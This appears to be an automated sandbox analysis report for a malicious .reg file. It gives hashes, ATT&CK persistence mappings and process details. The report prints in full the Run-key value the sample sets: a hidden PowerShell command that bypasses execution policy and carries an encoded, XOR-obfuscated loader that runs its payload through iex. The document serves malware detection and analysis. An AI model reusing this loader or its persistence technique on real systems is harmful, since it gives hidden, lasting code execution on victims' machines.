8f0700c47b590a8072cc4e12e3016788b678ffffbddb87883646697b39337074

General

Target

B4VVtERhIuUi.reg
Size

67KB
MD5

f0e94218233968b75d2ddb2040dc6617
SHA1

4f0e5778a92de896a753d924085e163130fb5584
SHA256

8f0700c47b590a8072cc4e12e3016788b678ffffbddb87883646697b39337074
SHA512

da863d750ae25545d6ff7f2dfbc78cc971d6332f14571da47cf88ab7a36ce60ce52f7c786420e322ffbd006d96b400339f3b9a6e0aa7c49c6f84855bd6180b0b
SSDEEP

1536:D4g540DoR+MQRxYvgUV/AV18G84p1V2ktjiEmpKXS4D18WsPHDqRO:DXmE0vPmMjkwpKpjsPHDqRO

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBkAEcASgA0AGYAMQBKAHIAWgBIAFYAbwBhAFYASgA1AFkAbQBaAG8AWQAxAEoAbABhAEgAOQBvAEsAaQAxAHcATgBpADEAawBhAEgAVQB0AEoAVwBSADYAZgB5ADAAZwBXAEgAOQBrAEwAVwBWADUAZQBYADEAKwBOAHkASQBpAGEARwBCADkAZQBYAFEAagBZADIAcAAvAFkAbQBZAGoAWgBHAEkAaQBmAG4AbAA0AGIAeQBOADUAZABYAGsAdABJAEYAaAArAGEARQA5AHMAZgBtAFIAdQBYAFcAeAAvAGYAbQBSAGoAYQBpADAAZwBSAFcAaABzAGEAVwBoAC8AZgBpADAAcABaAFcAaABzAGEAVwBoAC8AZgBpAFEAMgBMAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABQAGIASAA1AG8ATwB6AGsAdABNAEMAMABsAFMAbQBoADUASQBFAFIANQBhAEcAQgBkAGYAMgBKADkAYQBIADkANQBkAEMAMABnAFgAVwB4ADUAWgBTADAAcQBSAFUAWgBPAFcARABkAFIAWABtAEoAcgBlAFgAcABzAGYAMgBoAFIAUQB5AEoATQBLAGkAMABnAFEAMgB4AGcAYQBDADAAcQBhAEcATgB1AGYAMwBSADkAZQBTAG8AawBJADIAaABqAGIAbgA5ADAAZgBYAGsAMgBMAFMAbABtAGEASABRAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAwADUAaQBZADMAdABvAGYAMwBsAFEATgB6AGQATABmADIASgBnAFQAMgB4ACsAYQBEAHMANQBYAG4AbAAvAFoARwBOAHEASgBTAHAAUABiAEQAUgBpAFIARgBkAEcAWABXAG8AbQBQAG4AOQBkAE8ARwBKAGEAWgBrAFoATwBaADEAOQBNAE0ARABBAHEASgBEAFkAdABLAFcAUgA3AFUAbQB4AGoAYQBWAEoAcABiAEgAbABzAEwAVABBAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAE8AWQBtAE4ANwBhAEgAOQA1AFUARABjADMAUwAzADkAaQBZAEUAOQBzAGYAbQBnADcATwBWADUANQBmADIAUgBqAGEAaQBVAHAAYQBHAE4AdQBmADMAUgA5AGUAVwBoAHAAVAAyAHgAKwBhAEQAcwA1AEoARABZAHQASwBXAFIANwBMAFQAQQB0AEsAVwBSADcAVQBtAHgAagBhAFYASgBwAGIASABsAHMAVgBqADAAagBJAHoAdwA0AFUARABZAHQASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBWAEoAcABiAEgAbABzAEwAVABBAHQASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBWAGoAdwA3AEkAeQBNAHAAWgBIAHQAUwBiAEcATgBwAFUAbQBsAHMAZQBXAHcAagBRAFcAaABqAGEAbgBsAGwAVQBEAFkAdABLAFcAeABvAGYAaQAwAHcATABVAE4AbwBlAGkAQgBDAGIAMgBkAG8AYgBuAGsAdABYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBNAGEASAA1AEEAYgBHAE4AcwBhAG0AaABwAE4AaQAwAHAAYgBHAGgAKwBJADAAQgBpAGEAVwBnAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBPAFoASAAxAGwAYQBIADkAQQBZAG0AbABvAFUARABjADMAVABrADkATwBOAGkAMABwAGIARwBoACsASQAwAFoAbwBkAEMAMAB3AEwAUwBsAG0AYQBIAFEAMgBMAFMAbABzAGEASAA0AGoAUgBGAHMAdABNAEMAMABwAFoASABzADIATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAdABNAEMAMABwAGIARwBoACsASQAwADUALwBhAEcAeAA1AGEARQBsAG8AYgBuADkAMABmAFgAbABpAGYAeQBVAGsATgBpADAAcABhAFcAaAB1AFkAbQBsAG8AYQBVADkAMABlAFcAaAArAEwAVABBAHQASwBXAGwAbwBiAG4AOQAwAGYAWABsAGkAZgB5AE4AWgBmADIAeABqAGYAbQB0AGkAZgAyAEIATABaAEcATgBzAFkAVQA5AGgAWQBtADUAbQBKAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABTAGEAVwB4ADUAYgBDAEUAdABQAFMARQB0AEsAVwBoAGoAYgBuADkAMABmAFgAbABvAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBTAFEAMgBMAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AWgBhAEgAVgA1AEkAMABoAGoAYgBtAEoAcABaAEcATgBxAFUARABjADMAVwBGAGwATABOAFMATgBLAGEASABsAGUAZQBYADkAawBZADIAbwBsAEsAVwBsAG8AYgBtAEoAcABhAEcAbABQAGQASABsAG8AZgBpAFEAMgBMAFMAbAB2AGQASABsAG8AZgBpADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBUAG0ASgBqAGUAMgBoAC8AZQBWAEEAMwBOADAAdAAvAFkAbQBCAFAAYgBIADUAbwBPAHoAbABlAGUAWAA5AGsAWQAyAG8AbABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABiAEgANQBvAE8AegBrAGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGUAWQBXAGgAbwBmAFMAMABnAFgAbQBoAHUAWQBtAE4AcABmAGkAMAAvAE4AaQAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFQAQQB0AFYAbAA1ADAAZgBuAGwAbwBZAEMATgBFAFEAaQBOAGQAYgBIAGwAbABVAEQAYwAzAFMAbQBoADUAVwBXAGgAZwBmAFYAMQBzAGUAVwBVAGwASgBDADAAbQBMAFMAcABmAGEARwBwAE0AZgBtAEEAagBhAEgAVgBvAEsAagBZAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAEUAUQBpAE4ATABaAEcARgBvAFUARABjADMAVwBuADkAawBlAFcAaABNAFkAVwBGAFAAZABIAGwAbwBmAGkAVQBwAGUAVwBoAGcAZgBVAHQAawBZAFcAaABkAGIASABsAGwASQBTADAAcABiADMAUgA1AGEASAA0AGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGQAZgAyAEoAdQBhAEgANQArAEwAUwBCAEwAWgBHAEYAbwBYAFcAeAA1AFoAUwAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFMAQgBhAFoARwBOAHAAWQBuAHAAZQBlAFgAUgBoAGEAQwAxAEYAWgBHAGwAcABhAEcATQA9ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA="	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2732	regedit.exe

C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\B4VVtERhIuUi.reg"
1⤵
- Adds Run key to start application
- Runs .reg file with regedit
PID:2732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2732-0-0x0000000001B40000-0x0000000001B41000-memory.dmp

Filesize
4KB

Download
memory/2732-1-0x0000000001B40000-0x0000000001B41000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads